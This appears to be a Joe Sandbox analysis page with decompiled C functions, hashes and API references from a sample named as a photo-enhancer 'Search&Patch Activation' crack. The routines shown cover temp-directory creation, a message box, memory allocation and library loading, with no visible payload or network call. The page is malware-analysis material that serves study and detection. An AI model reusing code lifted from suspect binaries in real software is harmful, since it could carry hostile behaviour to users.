Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: 38633e948b603c813f450b03e218898c53e69348259ca8204e0d5802e89edcbc
Instruction ID: 5612ed86ad08d4bddb5d15266d7073179e0372755be9feb1331a68d3317c9ad6
Opcode Fuzzy Hash: 38633e948b603c813f450b03e218898c53e69348259ca8204e0d5802e89edcbc
Instruction Fuzzy Hash: 57114FB16442096EDB00EBE6CC52F9FB7ACEF49718F50007BB604F72C6DA789D048669

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACEC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E0040ACEC(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				CHAR* _t58;
				int _t63;
				void* _t64;
				intOrPtr _t65;
				void* _t69;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = __esi;
				_t91 = __edi;
				_t64 = __ebx;
				_pop(_t76);
				_pop(_t67);
				 *[fs:eax] = _t76;
				E00409E14(_t67);
				if(( *0x40de1b & 0x00000001) == 0 &&  *0x40c238 == 0) {
					_t57 =  *0x40dbd4; // 0x21c2008
					_t58 = E00403414(_t57);
					_t67 = _t93 - 0x10;
					_t76 =  *0x40dce4; // 0x21d14cc
					E0040928C(0xa1, _t93 - 0x10, _t76);
					_t63 = MessageBoxA(0, E00403414( *((intOrPtr*)(_t93 - 0x10))), _t58, 0x24);
					_t97 = _t63 - 6;
					if(_t63 != 6) {
						 *0x40c244 = 2;
						E00405CEC();
					}
				}
				E004026C4();
				E00409808(_t93 - 0x10, _t64, _t76, _t91, _t92); // executed
				E004031E8(0x40de40, _t64,  *((intOrPtr*)(_t93 - 0x10)), _t91, _t92);
				_t24 =  *0x40de30; // 0x21c03cc
				E00406DB0(_t24, _t67, _t93 - 0x24);
				E00406B48( *((intOrPtr*)(_t93 - 0x24)), _t64, _t93 - 0x10, 0x40b1bc, _t91, _t92, _t97);
				_push( *((intOrPtr*)(_t93 - 0x10)));
				_t29 =  *0x40de40; // 0x21c2de4
				E00406AC0(_t29, _t93 - 0x24);
				_pop(_t69);
				E00403340(0x40de44, _t69,  *((intOrPtr*)(_t93 - 0x24)));
				_t82 =  *0x40de44; // 0x21c2f18
				E004031E8(0x40de48, _t64, _t82, _t91, _t92);
				_t35 =  *0x40de3c; // 0x420f3c
				_t13 = _t35 + 0x14; // 0x52fd9
				_t36 =  *0x40de34; // 0x0
				E0040797C(_t36,  *_t13);
				_push(_t93);
				_push(0x40af84);
				_push( *[fs:edx]);
				 *[fs:edx] = _t94;
				 *0x40de8c = 0;
				_t40 = E00407994(1, 0, 1, 0); // executed
				 *0x40de38 = _t40;
				 *[fs:eax] = _t94;
				_t42 =  *0x40de3c; // 0x420f3c
				_t14 = _t42 + 0x18; // 0xbca00
				 *0x40de8c = E00402594( *_t14,  *[fs:eax], 0x40af73, _t93);
				_t65 =  *0x40de8c; // 0x23f0004
				_t86 =  *0x40de3c; // 0x420f3c
				_t15 = _t86 + 0x18; // 0xbca00
				E0040277C(_t65,  *_t15);
				_push(_t93);
				_push(0x40aec0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_t72 =  *0x40de34; // 0x0
				_t49 = E00407EDC(_t72, 1, 0x40820c); // executed
				 *0x40de90 = _t49;
				_push(_t93);
				_push(0x40aeaf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_t51 =  *0x40de3c; // 0x420f3c
				_t16 = _t51 + 0x18; // 0xbca00
				_t52 =  *0x40de90; // 0x24aca08
				E0040816C(_t52,  *_t16, _t65);
				_pop(_t90);
				 *[fs:eax] = _t90;
				_push(E0040AEB6);
				_t55 =  *0x40de90; // 0x24aca08
				return E00402924(_t55);
			}

0x0040acec
0x0040acec
0x0040acec
0x0040acee
0x0040acf0
0x0040acf1
0x0040ad11
0x0040ad1d
0x0040ad2a
0x0040ad2f
0x0040ad35
0x0040ad38
0x0040ad40
0x0040ad50
0x0040ad55
0x0040ad58
0x0040ad5a
0x0040ad64
0x0040ad64
0x0040ad58
0x0040ad69
0x0040ad71
0x0040ad7e
0x0040ad86
0x0040ad8b
0x0040ad9b
0x0040ada3
0x0040ada7
0x0040adac
0x0040adb9
0x0040adba
0x0040adc4
0x0040adca
0x0040adcf
0x0040add4
0x0040add7
0x0040addc
0x0040ade3
0x0040ade4
0x0040ade9
0x0040adec
0x0040adf1
0x0040ae09
0x0040ae0e
0x0040ae1e
0x0040ae21
0x0040ae26
0x0040ae2e
0x0040ae33
0x0040ae3d
0x0040ae43
0x0040ae46
0x0040ae4d
0x0040ae4e
0x0040ae53
0x0040ae56
0x0040ae5e
0x0040ae6b
0x0040ae70
0x0040ae77
0x0040ae78
0x0040ae7d
0x0040ae80
0x0040ae85
0x0040ae8a
0x0040ae8d
0x0040ae92
0x0040ae99
0x0040ae9c
0x0040ae9f
0x0040aea4
0x0040aeae

APIs

MessageBoxA.USER32 ref: 0040AD50

Strings

.tmp, xrefs: 0040AD96
xz@, xrefs: 0040AE04

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Message
String ID: .tmp$xz@
API String ID: 2030045667-184514067
Opcode ID: 73bde8918a24a77bea396c0e21e9449f08e0d1092fa56e2cd179e8c652837428
Instruction ID: cd6e40cb12cf75a94289ddc930eeb34ae46a26edf5cb602d02798e23291f977e
Opcode Fuzzy Hash: 73bde8918a24a77bea396c0e21e9449f08e0d1092fa56e2cd179e8c652837428
Instruction Fuzzy Hash: B641C574B006009FD301EFA5DE92A6A77A5EB59704B10443BF800BB7E1CA79AC14CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD07 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E0040AD07(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				CHAR* _t58;
				int _t63;
				void* _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				intOrPtr _t93;

				_t91 = __esi;
				_t90 = __edi;
				_t66 = __ecx;
				_t64 = __ebx;
				E00409FC0();
				E00402F24();
				E00409E14(_t66);
				if(( *0x40de1b & 0x00000001) == 0 &&  *0x40c238 == 0) {
					_t57 =  *0x40dbd4; // 0x21c2008
					_t58 = E00403414(_t57);
					_t66 = _t92 - 0x10;
					_t75 =  *0x40dce4; // 0x21d14cc
					E0040928C(0xa1, _t92 - 0x10, _t75);
					_t63 = MessageBoxA(0, E00403414( *((intOrPtr*)(_t92 - 0x10))), _t58, 0x24);
					_t96 = _t63 - 6;
					if(_t63 != 6) {
						 *0x40c244 = 2;
						E00405CEC();
					}
				}
				E004026C4();
				E00409808(_t92 - 0x10, _t64, _t75, _t90, _t91); // executed
				E004031E8(0x40de40, _t64,  *((intOrPtr*)(_t92 - 0x10)), _t90, _t91);
				_t24 =  *0x40de30; // 0x21c03cc
				E00406DB0(_t24, _t66, _t92 - 0x24);
				E00406B48( *((intOrPtr*)(_t92 - 0x24)), _t64, _t92 - 0x10, 0x40b1bc, _t90, _t91, _t96);
				_push( *((intOrPtr*)(_t92 - 0x10)));
				_t29 =  *0x40de40; // 0x21c2de4
				E00406AC0(_t29, _t92 - 0x24);
				_pop(_t68);
				E00403340(0x40de44, _t68,  *((intOrPtr*)(_t92 - 0x24)));
				_t81 =  *0x40de44; // 0x21c2f18
				E004031E8(0x40de48, _t64, _t81, _t90, _t91);
				_t35 =  *0x40de3c; // 0x420f3c
				_t13 = _t35 + 0x14; // 0x52fd9
				_t36 =  *0x40de34; // 0x0
				E0040797C(_t36,  *_t13);
				_push(_t92);
				_push(0x40af84);
				_push( *[fs:edx]);
				 *[fs:edx] = _t93;
				 *0x40de8c = 0;
				_t40 = E00407994(1, 0, 1, 0); // executed
				 *0x40de38 = _t40;
				 *[fs:eax] = _t93;
				_t42 =  *0x40de3c; // 0x420f3c
				_t14 = _t42 + 0x18; // 0xbca00
				 *0x40de8c = E00402594( *_t14,  *[fs:eax], 0x40af73, _t92);
				_t65 =  *0x40de8c; // 0x23f0004
				_t85 =  *0x40de3c; // 0x420f3c
				_t15 = _t85 + 0x18; // 0xbca00
				E0040277C(_t65,  *_t15);
				_push(_t92);
				_push(0x40aec0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				_t71 =  *0x40de34; // 0x0
				_t49 = E00407EDC(_t71, 1, 0x40820c); // executed
				 *0x40de90 = _t49;
				_push(_t92);
				_push(0x40aeaf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				_t51 =  *0x40de3c; // 0x420f3c
				_t16 = _t51 + 0x18; // 0xbca00
				_t52 =  *0x40de90; // 0x24aca08
				E0040816C(_t52,  *_t16, _t65);
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E0040AEB6);
				_t55 =  *0x40de90; // 0x24aca08
				return E00402924(_t55);
			}

0x0040ad07
0x0040ad07
0x0040ad07
0x0040ad07
0x0040ad07
0x0040ad0c
0x0040ad11
0x0040ad1d
0x0040ad2a
0x0040ad2f
0x0040ad35
0x0040ad38
0x0040ad40
0x0040ad50
0x0040ad55
0x0040ad58
0x0040ad5a
0x0040ad64
0x0040ad64
0x0040ad58
0x0040ad69
0x0040ad71
0x0040ad7e
0x0040ad86
0x0040ad8b
0x0040ad9b
0x0040ada3
0x0040ada7
0x0040adac
0x0040adb9
0x0040adba
0x0040adc4
0x0040adca
0x0040adcf
0x0040add4
0x0040add7
0x0040addc
0x0040ade3
0x0040ade4
0x0040ade9
0x0040adec
0x0040adf1
0x0040ae09
0x0040ae0e
0x0040ae1e
0x0040ae21
0x0040ae26
0x0040ae2e
0x0040ae33
0x0040ae3d
0x0040ae43
0x0040ae46
0x0040ae4d
0x0040ae4e
0x0040ae53
0x0040ae56
0x0040ae5e
0x0040ae6b
0x0040ae70
0x0040ae77
0x0040ae78
0x0040ae7d
0x0040ae80
0x0040ae85
0x0040ae8a
0x0040ae8d
0x0040ae92
0x0040ae99
0x0040ae9c
0x0040ae9f
0x0040aea4
0x0040aeae

APIs

MessageBoxA.USER32 ref: 0040AD50

Strings

.tmp, xrefs: 0040AD96
xz@, xrefs: 0040AE04

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Message
String ID: .tmp$xz@
API String ID: 2030045667-184514067
Opcode ID: 245864c1a257ed0c967638b67db9bb329bbae4f50c3bb27b4eac2111c384816e
Instruction ID: 53719d66007282c5495c6098f99a266dc5e357c3cd51cf55fd0a3e0a4036c937
Opcode Fuzzy Hash: 245864c1a257ed0c967638b67db9bb329bbae4f50c3bb27b4eac2111c384816e
Instruction Fuzzy Hash: B441C974B006009FC701EFA5DE92A5A77A5EB59704B10443BF800BB3E1CBB9AC04CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00409808 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00409808(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				int _t30;
				intOrPtr _t62;
				void* _t72;
				intOrPtr _t75;

				_t70 = __edi;
				_t53 = __ebx;
				_t54 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__edi);
				_t72 = __eax;
				_push(_t75);
				_push(0x4098f7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				while(1) {
					E004071A8( &_v12, _t53, _t54, _t70, _t72); // executed
					_t54 = 0x409910;
					E004096FC(0, _t53, 0x409910, _v12, _t70, _t72,  &_v8); // executed
					_t30 = CreateDirectoryA(E00403414(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t53 = GetLastError();
					if(_t38 != 0xb7) {
						E0040928C(0x36,  &_v28, _v8);
						_v24 = _v28;
						E0040511C(_t53,  &_v32);
						_v20 = _v32;
						E00407738(_t53,  &_v36);
						_v16 = _v36;
						E0040925C(0x68, 2,  &_v24,  &_v12);
						_t54 = _v12;
						E00405D18(_v12, 1);
						E00402EB4();
					}
				}
				E0040322C(_t72, _v8);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E004098FE);
				E004031B8( &_v36, 3);
				return E004031B8( &_v12, 2);
			}

0x00409808
0x00409808
0x0040980b
0x0040980d
0x0040980e
0x0040980f
0x00409810
0x00409811
0x00409812
0x00409813
0x00409814
0x00409815
0x00409817
0x00409818
0x0040981c
0x0040981d
0x00409822
0x00409825
0x00409828
0x0040982f
0x00409837
0x0040983e
0x0040984e
0x00409855
0x00000000
0x00000000
0x0040985c
0x00409864
0x00409872
0x0040987a
0x00409882
0x0040988a
0x00409892
0x0040989a
0x004098a7
0x004098ac
0x004098b6
0x004098bb
0x004098bb
0x00409864
0x004098ca
0x004098d1
0x004098d4
0x004098d7
0x004098e4
0x004098f6

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,004098F7,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040984E
GetLastError.KERNEL32(00000000,00000000,?,00000000,004098F7,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409857

Strings

.tmp, xrefs: 00409837

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 960547cf70513a17951bf964015fc0181e1b4ea2f4ac03f8a12b0497a0fc638c
Instruction ID: 99036c105fdce8595ace9a271e3c35a9b263f9a60d6b8e91bf220d2a738da6a3
Opcode Fuzzy Hash: 960547cf70513a17951bf964015fc0181e1b4ea2f4ac03f8a12b0497a0fc638c
Instruction Fuzzy Hash: 9F216775A10208ABDB00FFA5C8529DFB7B8EF84304F50457BE501B7382DA7C9E058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401430 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401430(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004012E4(0x40d43c, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x00401433
0x0040143d
0x0040144c
0x0040143f
0x0040143f
0x0040143f
0x00401452
0x0040145f
0x00401464
0x00401466
0x0040146a
0x00401473
0x0040147a
0x00401486
0x0040148d
0x00000000
0x0040148d
0x0040147a
0x00401492

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Strings

<;h, xrefs: 0040146E

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: <;h
API String ID: 2087232378-2917909428
Opcode ID: 1019e1cfc114c1811683628efa18df00737f836a0960651e9d73a3ee1452311a
Instruction ID: 66c3474f10fe082fedccbde799efe3bb5b58ff080b56d2e089ed954f0af67306
Opcode Fuzzy Hash: 1019e1cfc114c1811683628efa18df00737f836a0960651e9d73a3ee1452311a
Instruction Fuzzy Hash: DAF02772B0032017DB2069AA0CC1B536AC59F85B90F1540BBFA4CFF3F9D2B98C0442A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040150C Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040150C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x40d43c; // 0x683b3c
				while(_t35 != 0x40d43c) {
					_t42 =  *_t35;
					_t43 =  *(_t35 + 8);
					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
						if(_t43 < _v28) {
							_v28 = _t43;
						}
						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
						if(_t31 > _v24) {
							_v24 = _t31;
						}
						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
						if(_t32 == 0) {
							 *0x40d418 = 1;
						}
						E00401314(_t35);
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 != 0) {
					 *_v32 = _v28;
					_t27 = _v24 - _v28;
					 *((intOrPtr*)(_v32 + 4)) = _t27;
					return _t27;
				}
				return _t24;
			}

0x00401510
0x00401513
0x00401517
0x0040151a
0x00401524
0x00401528
0x0040152f
0x00401533
0x0040158c
0x0040153b
0x0040153d
0x00401542
0x00401553
0x00401555
0x00401555
0x0040155b
0x00401562
0x00401564
0x00401564
0x00401570
0x00401577
0x00401579
0x00401579
0x00401585
0x00401585
0x0040158a
0x0040158a
0x00401594
0x0040159a
0x004015a1
0x004015ab
0x004015b1
0x004015b9
0x00000000
0x004015b9
0x004015c3

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401570

Strings

<;h, xrefs: 00401533

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FreeVirtual
String ID: <;h
API String ID: 1263568516-2917909428
Opcode ID: aa92942ecb50d866b70c44cc6147264c5baa39c8187bf4e8357453622c40a3ad
Instruction ID: ed4d65520c00d96bd64096adec8f86249eaccd310614155879460d3c6a05d2ca
Opcode Fuzzy Hash: aa92942ecb50d866b70c44cc6147264c5baa39c8187bf4e8357453622c40a3ad
Instruction Fuzzy Hash: EC21F970608711AFC700DF19C880A5AB7E0EFC4760F14C96AE899AB3A1D374EC45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004015C4 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004015C4(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40d43c; // 0x683b3c
				while(_t29 != 0x40d43c) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x004015cb
0x004015cf
0x004015d6
0x004015eb
0x004015f3
0x004015f9
0x004015ff
0x00401602
0x00401646
0x0040160a
0x00401610
0x00401614
0x00401616
0x00401616
0x0040161c
0x0040161e
0x0040161e
0x00401624
0x00401631
0x00401638
0x0040163a
0x00401640
0x00000000
0x00401640
0x00401638
0x00401644
0x00401644
0x00401655

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401631

Strings

<;h, xrefs: 00401602

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AllocVirtual
String ID: <;h
API String ID: 4275171209-2917909428
Opcode ID: d4acb752bdc269da540978c828d158b8c6d48103d470b273f403a42f37574e7b
Instruction ID: 13775360a171ec616e5abeac029644eb566c02332a7212012712ef6e6389ad23
Opcode Fuzzy Hash: d4acb752bdc269da540978c828d158b8c6d48103d470b273f403a42f37574e7b
Instruction Fuzzy Hash: B0117CB2A047019FC3109F29CC80A1BB7E5EBC4760F19C93DE598A73A4D636AC408689

Uniqueness

Uniqueness Score: -1.00%

Function 00401658 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00401658(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40d43c; // 0x683b3c
				while(_t19 != 0x40d43c) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40d418 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x0040165c
0x0040166d
0x00401674
0x0040167d
0x00401681
0x00401684
0x00401687
0x004016c7
0x0040168f
0x00401695
0x0040169a
0x0040169c
0x0040169c
0x004016a1
0x004016a3
0x004016a3
0x004016a7
0x004016b2
0x004016b9
0x004016bb
0x004016bb
0x004016b9
0x004016c5
0x004016c5
0x004016d4

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2

Strings

<;h, xrefs: 00401687

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FreeVirtual
String ID: <;h
API String ID: 1263568516-2917909428
Opcode ID: 94d053d0c3743bff5dc438ce53a4c6e7cb02053c2ce333ba5c6edfdb2e0f1eae
Instruction ID: d2bd3e7102ef9204b91f8816383c595cec19663beeae75bd92b4ab4675e4226e
Opcode Fuzzy Hash: 94d053d0c3743bff5dc438ce53a4c6e7cb02053c2ce333ba5c6edfdb2e0f1eae
Instruction Fuzzy Hash: E401F772A042104BC310AF28DDC092A77D4DB84324F19497ED985B73A1D23B7C0587A8

Uniqueness

Uniqueness Score: -1.00%

Function 00407454 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00407454(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4074c6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x4074a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryA(E00403414(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E004074AF);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x00407455
0x00407457
0x0040745b
0x0040745e
0x00407463
0x00407468
0x00407469
0x0040746e
0x00407471
0x00407474
0x00407479
0x0040747a
0x0040747f
0x00407482
0x0040748d
0x00407492
0x00407497
0x0040749a
0x0040749d
0x004074a2
0x004074a4
0x004074a7

APIs

SetErrorMode.KERNEL32(00008000), ref: 0040745E
LoadLibraryA.KERNEL32(00000000,00000000,004074A8,?,00000000,004074C6,?,00008000), ref: 0040748D

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

